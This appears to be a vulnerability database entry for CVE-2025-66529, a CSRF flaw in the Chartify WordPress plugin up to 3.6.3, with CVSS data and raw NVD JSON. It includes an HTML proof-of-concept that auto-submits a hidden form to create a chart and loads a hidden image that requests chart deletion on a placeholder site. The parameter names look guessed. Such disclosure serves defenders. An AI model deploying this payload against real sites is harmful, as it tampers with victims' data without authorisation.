Security Vulnerability Report
中文
CVE-2025-66529 CVSS 4.3 MEDIUM

CVE-2025-66529

Published: 2025-12-09 16:18:20
Last Modified: 2026-04-27 18:16:38

Description

Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Chartify chart-builder allows Cross Site Request Forgery.This issue affects Chartify: from n/a through <= 3.6.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Chartify <= 3.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-66529 - Chartify Plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - Chartify</title> </head> <body> <h1>Chartify CSRF Vulnerability PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in Chartify plugin <= 3.6.3</p> <!-- Auto-submit form for chart creation/modification --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="chartify_save_chart"> <input type="hidden" name="chart_title" value="Malicious Chart"> <input type="hidden" name="chart_data" value="malicious_data"> <input type="hidden" name="chart_type" value="bar"> <input type="hidden" name="security_nonce" value=""> </form> <!-- Alternative: Image tag with auto-load for GET-based operations --> <img src="https://target-site.com/wp-admin/admin.php?page=chartify&action=delete&chart_id=1" width="0" height="0" style="display:none;"> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p><strong>Note:</strong> Replace 'target-site.com' with the actual WordPress site URL.</p> <p><strong>Defense:</strong> Add CSRF tokens and validate request origins to prevent this attack.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66529", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:20.157", "lastModified": "2026-04-27T18:16:38.357", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Chartify chart-builder allows Cross Site Request Forgery.This issue affects Chartify: from n/a through <= 3.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/chart-builder/vulnerability/wordpress-chartify-plugin-3-6-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}